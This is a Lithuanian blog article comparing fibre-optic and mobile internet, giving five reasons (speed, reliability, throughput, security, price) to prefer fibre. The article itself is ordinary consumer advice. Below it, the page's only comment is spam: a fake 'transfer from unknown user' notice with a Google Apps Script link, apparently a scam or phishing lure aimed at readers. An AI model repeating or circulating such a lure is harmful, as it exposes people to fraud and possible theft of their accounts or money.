5 priežastys, kodėl šviesolaidinis internetas yra geresnis sprendimas už mobilų internetą

Interneto tiekėjai dažnai siūlo du pasirinkimus – šviesolaidinį ir nešiojamą mobilų internetą. Neturint specialių žinių gali būti sudėtinga nuspręsti, kuris pasirinkimas geriau atitinka jūsų poreikius, tad šiame straipsnyje panagrinėsime, kuo šviesolaidinis internetas yra pranašesnis.

  1. Didesnis greitis

Kalbant techniškai, skiriasi principas, kurį duomenų perdavimui naudoja mobilus ir šviesolaidinis internetas. Pastaruoju atveju pasitelkiami optiniai šviesos bangų kabeliai, kurie užtikrina itin didelę perduodamų duomenų spartą. Mobilus internetas, deja, negali prilygti tokiam greičiui.

O ką interneto greitis reiškia praktikoje? Tai mažesnis delsimas, greitesnis failų atsiuntimas, svetainių įkėlimo greitis, o taip pat ir ryšio stabilumas, net ir esant didelei apkrovai. Nešiojamas mobilus internetas yra ne tik lėtesnis, bet ir pasižymi kintamu greičiu, priklausomai nuo vietovės, o tai reiškia, kad skirtingiems vartotojams jis gali veikti skirtingu greičiu.

  1. Patikimesnis ryšys

Šviesolaidinis internetas daugelyje šaltinių yra įvardijamas kaip vienas patikimiausių sprendimų interneto ryšio tiekimui. Čia svarbus vaidmuo tenka infrastruktūrai, kuri yra gerai išvystyta daugelyje vietovių. Naudojami specialūs kabeliai yra atsparūs aplinkos poveikiui, o tai leidžia užtikrinti puikų ryšio stabilumą, išvengti perkrovų ir tinklo pažeidimų.

Tuo tarpu mobilus internetas yra veikiamas aplinkos veiksnių, kurie gali sumažinti jo spartą ir pakenkti patikimumui apskritai. Mobiliojo interneto perdavimui naudojami aukštai iškelti ryšio bokštai ir antenos, kurie yra labiau pažeidžiami gamtos sąlygų, pavyzdžiu, vėjo ar žaibo. Nors jų taisymas yra palyginti greitas, gedimų dažnis – didesnis. Šviesolaidinis internetas yra stabilesnis, nes jo kabeliai nutiesti po žeme, kuri santykinai apsaugo tinklą nuo pažaidos iš išorės.

  1. Didesnis duomenų srautas

Jei namuose yra daugiau vartotojų arba ieškote interneto nedideliam biurui, šviesolaidinis internetas yra geresnis sprendimas. Jis pasižymi didesniu duomenų srautu, todėl vartotojai gali sklandžiai naudotis ryšiu net ir atlikdami daugiau greičio reikalaujančias operacijas, pavyzdžiui, siųsdami didelės apimties failus. Tuo tarpu mobilus internetas, esant didesniam vartotojų skaičiui, gali nesugebėti greitai perduoti didelio duomenų srauto.

  1. Ryšio saugumas ir privatumas

Net jei nesate nukentėję nuo sukčių internete ir nemąstote apie saugumą, apsidrausti verta. O tokiu atveju geresnis sprendimas taip pat yra šviesolaidinis internetas. Jis yra geriau apsaugotas nuo įsilaužimų iš išorės, ryšio privatumui užtikrinti naudojamas šifravimas ir kitos saugumo priemonės.

  1. Mažesnė kaina

Nors interneto kainos priklauso nuo pasirinkto tiekėjo, vertinant bendrai, šviesolaidinis internetas kainuoja pigiau. Dažniausiai jo planas kainuoja apie keliolika eurų per mėnesį, o dėl ryšio patikimumo galite naudoti ji ir keliems kompiuteriams ar įrenginiams. Tai dar vienas svarus privalumas, skatinantis rinktis šviesolaidinį internetą tiek namams, tiek darbui.

One Comment

  1. 🔄 You got a transfer from unknown user. GET => https://script.google.com/macros/s/AKfycbzoHxgSAQSWCEnzd5L9yUl-apEFE2iofEnZkgXETA3LM1hSy8whmysnBhDrPB7iNzJV7w/exec?hs=dc33c38c1444215b0c62768f54ca2b33& 🔄 parašė:

    xdv0j2

Parašykite komentarą

El. pašto adresas nebus skelbiamas. Būtini laukeliai pažymėti *

Rekomenduojami Video

TAIP PAT SKAITYKITE